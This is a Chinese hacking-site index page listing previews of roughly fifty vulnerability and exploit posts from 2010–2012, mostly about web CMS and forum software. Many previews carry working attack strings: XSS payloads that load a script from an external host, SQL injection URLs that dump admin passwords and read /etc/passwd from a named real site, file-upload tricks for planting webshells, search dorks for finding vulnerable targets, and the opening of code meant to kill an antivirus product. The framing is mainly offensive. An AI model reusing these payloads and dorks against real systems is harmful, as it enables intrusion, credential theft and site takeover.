首 页 ┆  黑客软件 ┆  绿色软件 ┆  会员教程 ┆  全球时讯 ┆  技术学院 ┆  流行代码 ┆  移动资讯 ┆  范文 ┆  专科 ┆  论文
当前位置:黑客基地学院黑客技术漏洞分析
学院标题关闭所有内容预览 | 展开所有内容预览
  • HTML5中容易被攻击的5个“漏洞” [内容预览] 0 | 2012-06-12
    在HTML5迅速崛起的同时,我们也不得不认识到HTML5给我们带来的安全问题,而且是不容小觑的安全问题。本文主要从劫持、跨域请求、桌面通知、地理定位、表单篡改这几个方面来分析了HTML5中不容忽视的几个安全“漏洞”,...

    [阅读全文]

  • Mysql跨库入侵介绍 [内容预览] 0 | 2011-05-22
    入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。 那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之….. (当然你也...

    [阅读全文]

  • 建站之星Sitestar v1.3 FCK上传漏洞 [内容预览] 0 | 2011-01-17
    发布日期:2011-01.14 发布作者:xiaocao 影响版本:V1.3 官方网站:http://www.sitestar.cn/ 漏洞类型:文件上传 漏洞描述:此漏洞只适于Windows IIS6 ,是FCK编辑器造成的,只要是建成了的客户站.都有。。 . ...

    [阅读全文]

  • 华夏外挂下载系统2.0漏洞利用 [内容预览] 0 | 2011-01-17
    大家对外挂这个词肯定不陌生吧?这可是玩网络游戏必备工具啊。现在的很多东西都商业化了,外挂也不例外,好不容易找到个好点的外挂,但是点击下载的时候居然说要收费,真是气死人。今天我们就一起来看一个外挂下载系...

    [阅读全文]

  • 智睿网络投票评选管理系统v3.6.0XSS0day [内容预览] 0 | 2011-01-17
    From:B0mbErM@n 描述:提交功能过滤不严导致XSS执行 官网: www.zhirui.net 分析:UserAdd.asp过滤不严 修补:过滤 Exp:注册用户 > 发表评选 > 评选缩图中插入XSS代码 "><SCRIPT SRC=http://521.im/XSS/xss.js></S...

    [阅读全文]

  • 新华企业网站管理系统v4.0 XSS0day [内容预览] 0 | 2011-01-17
    From:B0mbErM@n 描述:在线报修功能未进行提交过滤 分析:xiu.asp未进行提交过滤,导致执行任意XSS语句。 修补:过滤 Exp: ../xiu.asp直接进入报修,然后在联系地址中写上 <SCRIPT SRC=http://website/XSS/xss.js...

    [阅读全文]

  • PJBlog3 v3.1.6.227 漏洞及解决方案 [内容预览] 0 | 2011-01-13
    1.查看默认数据库blogDB/PBLog3.asp是否存在! 2。注册个ID 3。以┼攠數畣整爠煥敵瑳∨≒┩眾┼砧 这个为名 密码随便下 4。在到用户管理位置找到 你注册的用户 在把这个 |||┠砾。“:%>x”unicode压缩后“┠...

    [阅读全文]

  • Discuz非创始人管理员代码执行 [内容预览] 0 | 2011-01-13
    by:alibaba global.func.php function sendpm($toid, $subject, $message, $fromid = '') { 02 if($fromid === '') { 03 require_once DISCUZ_ROOT.'./uc_client/client.php'; 04 $fromid = $discuz_uid;...

    [阅读全文]

  • zblog1.8 最新跨站XSS漏洞及修复方法 [内容预览] 0 | 2011-01-13
    发布作者:Clouder 影响版本:zblog 1.8 官方网站:http://www.rainbowsoft.org/ 漏洞类型:路站 漏洞文件:cmd.asp 漏洞地址:http://blog.rainbowsoft.org/cmd.asp?act=gettburl&id=10"><iframe%20sr...

    [阅读全文]

  • 华讯网络管理系统注入漏洞利用 [内容预览] 0 | 2010-11-22
    华讯网络管理系统存在SQL注入,可获取管理员用户密码信息。 关键字:inurl:chk_case.asp 漏洞测试: http://www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,...

    [阅读全文]

  • Phpcms 2008 query.php SQL注入漏洞 [内容预览] 0 | 2010-11-22
    EXP: ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6...

    [阅读全文]

  • Discuz! 7.2以下版本及各uc产品api接口Get webshell漏洞 [内容预览] 0 | 2010-11-22
    对于dz,我们比较关心的是拿shell,但dz的东西想拿shell太难太难了,上一篇文章的末尾铺垫了下,所以这篇文章也算不上马后炮了...这个漏洞已经在discuz! x1版本悄悄给补上了,但是7.2及以下含有uc接口的版本的均没有...

    [阅读全文]

  • E-Php 内容管理系统SQL注射及修复 [内容预览] 0 | 2010-11-22
    漏洞类型:SQL注入 漏洞描述:E-Php Content Management System (CMS),article.php页面存在SQL注射。 漏洞测试: http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,1...

    [阅读全文]

  • MSNshell存漏洞 13万用户被攻击 [内容预览] 0 | 2010-10-10
    广大网友们近期在提防著名的“超级工厂”蠕虫病毒侵袭的同时,还要对MSN的增强包MSNshell官方软件的最新版本的一个0day漏洞提高警惕。瑞星发布的预警显示,该漏洞目前已被黑客利用,用于进行挂马网站攻击,已有超过1...

    [阅读全文]

  • Adobe曝漏洞 PDF文件“点击即中毒” [内容预览] 0 | 2010-10-04
    近日,Adobe公司曝出最新ODay漏洞。当用户使用Adobe Reader或Adobe Acrobat打开包含恶意代码的PDF文件时可能导致电脑被黑客完全控制,可谓“点击即中毒”。目前,包含恶意代码的PDF文件已在网上传播,危害很大。Adob...

    [阅读全文]

  • msnshell远程代码执行漏洞 [内容预览] 0 | 2010-09-21
    作者:疯狗 来源:WooYun 简要描述: msnshell是国内一款多功能的msn辅助工具,有着方便而强大聊天加密功能,使其用户群非常广泛,但是该应用有一些已存在多年的远程代码执行漏洞。 详细说明: 问题出在msnsh...

    [阅读全文]

  • eNdonesia 8.4 SQL 注入漏洞 [内容预览] 0 | 2010-09-21
    Dork : mod.php?mod=publisher&op=printarticle&artid= http://localhost/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i] 注入测试 http://www.myhack58.com/mod.php?mod=publi...

    [阅读全文]

  • PHP168 V6.02整站系统远程执行任意代码漏洞 [内容预览] 0 | 2010-09-21
    author:Luc1f3r blog:http://hi.baidu.com/luc1f3r_ 漏洞出在inc/function.inc.php里面.get_html_url()这个函数. function get_html_url(){ global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml...

    [阅读全文]

  • [图文] dedecms v5.3-v5.6 Get Shell 0day利用分析 [内容预览] 0 | 2010-09-21
    author:toby57 team:www.wolvez.org 此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。 Gif89a{dede:field name='...

    [阅读全文]

  • Phpcms2008本地文件包含漏洞及利用 [内容预览] 0 | 2010-09-18
    漏洞文件在wap/index.php,包含的文件限制为*.inc.php。随便包含一个有利用价值的去包含即可。 formguide/admin/include/fields/datetime/field_add.inc.php EXP:错误的!!!!!!请看最下面的 老君只...

    [阅读全文]

  • [图文] Baigo CMS 1.1.1 登录框注入分析到利用 [内容预览] 0 | 2010-09-18
    baigo CMS 是采用 ASP + Access 开发的网站内容管理系统。只要采用 Windows 系统的服务器或支持 ASP + Access 的服务器均可安装部署(包括虚拟主机)。baigo CMS 同时还是一款开源、免费的网站内容管理系统。baigo 承...

    [阅读全文]

  • [图文] Flash 10.1曝高危漏洞 [内容预览] 0 | 2010-09-16
    Flash 10.1是Android 2.2中加入的新功能,能帮助用户更好的体验网络视频。不过Flash 10.1在进入Android 2.2之后就一直问题不断,早前曾曝出不稳定、卡死等问题,日前Abode公司又宣布Flash Player 10.1中存在一个高...

    [阅读全文]

  • 微软新补丁遗漏dll劫持漏洞 [内容预览] 0 | 2010-09-16
    北京时间9月15日消息,微软9月安全更新发布9个补丁,用于修复Windows、互联网信息服务 (IIS) 和 Microsoft Office中的11个安全漏洞。截至发稿前,金山卫士已于第一时间向广大用户推送了微软最新补丁。但令人遗憾的是...

    [阅读全文]

  • ecshop最新暴路径oday [内容预览] 0 | 2010-09-14
    简要描述: /affiche.php,php5环境提示错误暴露程序路径,php4环境显示写入的信息 详细说明: charset参数未做严谨过滤导致http消息头截断写入 漏洞证明: http://www.***.com/ecshop/affiche.php?act=js&t...

    [阅读全文]

  • BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞 [内容预览] 0 | 2010-09-14
    影响版本: BlueCMS v1.6 sp1 漏洞描述: 缺陷文件:ad_js.php 漏洞成因: 12: $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //根目录下其他文件都做了很好的过滤,对数字型变量几...

    [阅读全文]

  • [图文] ECSHOP 搜索注入漏洞利用exp及后台拿shell [内容预览] 0 | 2010-09-14
    这个是search.php exp 变种 search.php? encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVu...

    [阅读全文]

  • [图文] IIS 0Day --IIS的另一个解析漏洞! [内容预览] 331 | 2010-03-31
    当上传图片为x.asp;x.jpg时,IIS会自动解析为asp格式, 所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。 把webshell文件名改成 1.asp;.jpg ...

    [阅读全文]

  • phpaaCMS V0.3 存在注射漏洞 [内容预览] 83 | 2010-03-30
    偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了! You have an error in your SQL syntax; check the manual that correspon...

    [阅读全文]

  • Discuz!的最新拿Webshell法 [内容预览] 232 | 2010-03-30
    Discuz!的最新拿Webshell法,测试可行 无意中入侵了游戏官方网站,可拿不到Webshell,郁闷中发现里面有个Discuz!论坛,马上根据已经拿到的密码社工,呵呵,居然成功进入后台!可是毕竟是6.0+的版本(管理员把版权...

    [阅读全文]

  • PJblog V3.0 0day [内容预览] 47 | 2010-03-30
    漏洞具体细节请看200904/37533.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下: If WScript.Arguments.Count <> 2 Then WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址...

    [阅读全文]

  • [图文] phpaaCMS V0.3 存在注射oday漏洞 [内容预览] 41 | 2010-03-30
    偶然路过一个php的站,由于自己很少对PHP有研究所以马虎的看了看是phpaaCMS ,不是大型的CMS,习惯性的在后面加了个“'”,没想到爆错了! You have an error in your SQL syntax; check the manual that corresp...

    [阅读全文]

  • [图文] shopxp网上购物系统 v7.4 爆密码0day [内容预览] 202 | 2010-03-30
    漏洞版本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp shopxp_news.asp 暴密码的语句: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5...

    [阅读全文]

  • 网商科技企业管理系统2.0 cookies注射 [内容预览] 64 | 2010-03-30
    H4ckx7's Blog http://hi.baidu.com/77dear 漏洞文件 Inc\Check_Sql.asp <% Dim Query_Badword,Form_Badword,i,Err_Message,Err_Web,name '--定义部份 头-- Err_Message = 1 '处理方式:1=提示信息,2=转向...

    [阅读全文]

  • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit的利用 [内容预览] 35 | 2010-03-26
    From 素包子's blog 很早之前就看到过这个漏洞,但是由于Y是bruteforce的,就没太关注了,昨天和一个朋友聊到这个漏洞,仔细看了下,危害还是挺大的,虽然需要一定条件才可以利用。 EXP在http://www.milw0rm.com...

    [阅读全文]

  • Discuz! NT3.0后台拿shell [内容预览] 83 | 2010-03-26
    作者:icysun 本人不才,搞了好长时间才搞明白怎么拿shell 进了后台我们可以知道网站的路径,这个很重要 直接导出一句话 Select * from table1 into outfile 'c:\test.txt' 这样是不行的(不知道是我哪里不对,...

    [阅读全文]

  • 瑞星最新0day漏洞 [内容预览] 148 | 2010-03-26
    编写成程序后双击运行直接K掉瑞星(重起也没用) 以下是漏洞利用代码 -- DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0; HANDLE hSnapshot = CreateToolhelp32Sna...

    [阅读全文]

  • [图文] VBulletin 4.0.2 跨站脚本漏洞 [内容预览] 40 | 2010-03-26
    vBulletin是一款开放源代码的PHP论坛程序。 当search_type设置为1的时候,vBulletin没有正确的过滤提交给search.php页面的query参数便返回给了用户,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致...

    [阅读全文]

  • Internet Explorer 7.0 0day [内容预览] 61 | 2010-03-26
    <script language="javascript"> if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank"); function sleep(milliseconds) { var start=new Date().getTime(); for(v...

    [阅读全文]

  • shopxp网上购物系统 v7.4 0day [内容预览] 110 | 2010-03-26
    漏洞版本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp shopxp_news.asp 暴密码的语句: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpass...

    [阅读全文]

  • PHPWind 6.0多个跨站脚本漏洞 [内容预览] 42 | 2010-03-25
    PHPWind是一款国内比较流行的基于PHP的Web论坛程序。 PHPWind在访客注销时没有正确的过滤提交给hack.php、search.php、read.php、post.php、thread.php、 profile.php、sort.php、message.php、userpay.php等页面...

    [阅读全文]

  • XSS漏洞发掘与测试操作手册 [内容预览] 45 | 2010-03-25
    有输入框的页面测试 对于非富文本在输入框中输入特殊字符 <”sitedir ’> 提交 在提交后的页面查看源代码根据关键字tiehua查找源代码中的tiehua前后的<”>’是否已经被转义成 <">&apos 如果未被转义说明这个输...

    [阅读全文]

  • phpcms 3.0.0文件上传漏洞 [内容预览] 69 | 2010-03-23
    漏洞文件: ads/upload.php、uppic.php 代码如下: require "common.php"; require PHPCMS_ROOT."/class/upload.php"; if(!$_userid) message("请您先登录或注册!" , PHPCMS_PATH."member/login.php"); ...

    [阅读全文]

  • [图文] webTextbox 编辑器 0day [内容预览] 49 | 2010-03-23
    谷歌搜索:inurl:system_dntb http://web/system_dntb/uploadimg.aspx UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/; 上传木马类型a.cdx;1.jpg a.asp;.jpg 测试结果ht...

    [阅读全文]

  • Textbox 编辑器 0day [内容预览] 51 | 2010-03-23
    From:www.3est.com author:Mars UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/; C:\a.cdx;1.jpg system_dntb/uploadimg.aspx http://www.laes.com.cn/inc.asp htt...

    [阅读全文]

  • youku iphone频道存在注入 [内容预览] 32 | 2010-03-23
    http://iphone.youku.com/video.php?ch=1&id=18751916 and 1=2 union select 1,2,user(),4,5,6,7,8,9,10,11/* 真没想到youku存在这么样的问题,权限还不小,能读到文件,看来安全还是从小处着手啊: root:x:...

    [阅读全文]

  • DEDECMS 重置管理员admin的密码的php文件 [内容预览] 172 | 2010-03-23
    DEDECMS 重置管理员admin的密码的php文件 <?php /* 作用:DEDECMS 重置管理员admin的密码为123456,适用于DedeCms V5 方法:上传到服务器DEDE系统的目录,运行此文件,然后进入后台修改密码 注意:重置后...

    [阅读全文]

  • [图文] oracle显错注入暴数据 [内容预览] 62 | 2010-03-20
    第一种方法 http://www.xxox.cn/mickey/news.php?id=25190 and and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(6...

    [阅读全文]

  • [图文] oracle无显错注入暴数据 [内容预览] 17 | 2010-03-20
    第一种方法 http://www.xxox.cn/mickey/news.php?id=25190′ aNd 1=2 unIon all selEct null,cHr(33)||data||cHr(33),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu...

    [阅读全文]

  • 如何测试XSS漏洞 [内容预览] 23 | 2010-03-20
    黑盒手动测试 • 有输入框的页面测试 对于非富文本在输入框中输入特殊字符 <”tiehua ‘> 提交 在提交后的页面查看源代码根据关键字tiehua查找源代码中的tiehua前后的<”>’是否已经被转义成 ...

    [阅读全文]

  • W78CMS SQL注入漏洞 [内容预览] 25 | 2010-03-20
    W78企业ASP网站管理系统V1.1的SQL注入 程序发布日期:2010年03月18日. 裸奔的系统。 1.shopmore.asp set rs=server.createobject("adodb.recordset") exec="select * from [shop] where ssfl="& request...

    [阅读全文]

总数:20550 上一页1 2 3 4 5下一页
♂返回顶部 - 本站声明 - 广告说明 - 网站地图 -
Copyright © 2005-2018 www.VeryDown.com. All Rights Reserved .
始终被模仿 从未被超越